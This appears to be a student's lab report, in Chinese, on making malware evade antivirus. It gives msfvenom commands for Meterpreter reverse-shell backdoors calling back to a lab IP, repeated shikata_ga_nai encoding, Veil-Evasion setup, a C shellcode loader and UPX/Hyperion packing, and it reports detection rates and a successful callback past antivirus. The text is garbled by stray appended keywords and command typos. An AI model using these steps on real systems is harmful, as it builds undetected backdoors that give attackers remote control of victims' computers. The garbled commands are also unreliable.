2、實驗過程java
3、問題與思考
git
一、實驗內容
(1)正確使用msf編碼器,msfvenom生成如jar之類的其餘文件,veil-evasion,本身利用shellcode編程等免殺工具或技巧;(1.5分)shell
(2)經過組合應用各類技術實現惡意代碼免殺(1分)(若是成功實現了免殺的,簡單語言描述原理,不要截圖。與殺軟共生的結果驗證要截圖。)編程
(3)用另外一電腦實測,在殺軟開啓的狀況下,可運行並回連成功,註明電腦的殺軟名稱與版本(1分)windows
二、基礎問題回答
(1)殺軟是如何檢測出惡意代碼的?網絡
(2)免殺是作什麼?tcp
(3)免殺的基本方法有哪些?編輯器
Task1 1.使用msf編碼器生成後門程序及檢測工具
二、嘗試用msf編碼器對後門程序進行一次到屢次的編碼
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.116.128 LPORT=5226 -f exe > met-encoded.exe
其中-e
爲編碼msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.116.128 LPORT=5226 -f exe > met-encoded10.exe
其中-i
爲指定編碼個數Task1 2.msfvenom生成jar等文件
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.116.128 lport=5226 x> 20165226_backdoor_java.jar
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.116.128 lport=5226 x> 20165226_backdoor.php
Task1 3.veil-evasion
sudo apt-get install veil-evasion
注意此處請下載veil-evasion,否則以後會有各類bug,想感覺一下錯誤具體內容的同窗能夠直接veil,固然若是沒報錯那更好
nexxt
,把須要多選的全選上Done!
,則安裝成功veil
啓用veiluse evasion
進入veil-evasion用C語言重寫meterperteruse c/meterpreter/rev_tcp.py
設置反彈鏈接IP及端口,注意此處IP是kaliIP
輸入generate
生成文件
到/var/lib/veil/output/compiled/playload5226.exe
這個路徑下找咱們生成的exe文件,或者直接cp -r /var/lib/veil/output/compiled/playload5226.exe ~/20165226/exp3
把生成的文件複製到咱們熟悉的路徑下。
傳回主機時被截獲
Task1 4.用shellcode編程
msfvenom -p windows/meterpreter/reverse_http lhost=192.168.116.128 lport=5226 -f c
20165226.c
,而後將unsigned char buf[]
賦值到其中unsigned char buf[] = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" 。。。。。。 "\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"; int main() { int (*func)() = (int(*)())buf; func(); }
i686-w64-mingw32-g++ 20165226.c -o 20165226.exe
編譯.c文件爲可執行文件lxs.exe
,進行加殼upx lxs.exe -o lxs_upxed.exe
/usr/share/windows-binaries/hyperion/
目錄中/usr/share/windows-binaries/hyperion/
中wine hyperion.exe -v lxs_upxed.exe lxs_upxed_Hyperion.exe
Task 2 經過組合應用各類技術實現惡意代碼免殺
將要捆綁的文件放在同一個文件夾下,右擊選擇「添加到壓縮文件」
放到virscan.org試一下,由32%降爲30%,其實並無太大改善
Task 3 用另外一電腦實測,在殺軟開啓的狀況下,可運行並回連成功,註明電腦的殺軟名稱與版本
問題1:在用msf編輯器對後門程序進行過屢次編碼時出現錯誤
問題1解決方案:由圖可知,編譯產生了0x20
,當出現0
時表示截止,多是編譯次數太多,所以將26次改爲10次,再運行,編譯成功
問題2:輸入sudo ./setup.sh -c
後,顯示以下後編再也不有任何操做更新,20分鐘後仍無
問題2解決方案:以前是git clone
的veil,而後我直接經過命令行sudo apt-get install veil-evasion
在線下載,用了近一個半小時但下載後原虛擬機自動重啓,而後一直黑屏,再次重啓也沒法打開,因而從新拷了一臺虛擬機,再次重複操做。
問題3:下載後進行安裝時,一路next後,最後報錯
問題3解決方案:輸入/ust/share/veil/config/setup.sh
再次進入安裝
問題4:從新安裝後出現could not load wine-gecko
的錯誤
問題4解決方案:經過查找資料,解決方案以下
輸入如下代碼
$ mkdir -p ~/.cache/wine $ cd ~/.cache/wine $ wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi $ wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi
而後返回主目錄,再次輸入/usr/share/veil/config/setup.sh
進行安裝,成功
apt-get install open-vm-tools-desktop fuse
安裝open-vm-tools
vi /etc/apt/sources.list
,打開後把deb http://mirrors.tuna.tsinghua.edu.cn/kali/ kali-rolling contrib main non-free
(清華的源)加進去,再將kali的源註釋掉(首行加#
)apt-get update && apt-get upgrade
vmtools
:apt-get install open-vm-tools-desktop fuse
lxs.exe
便可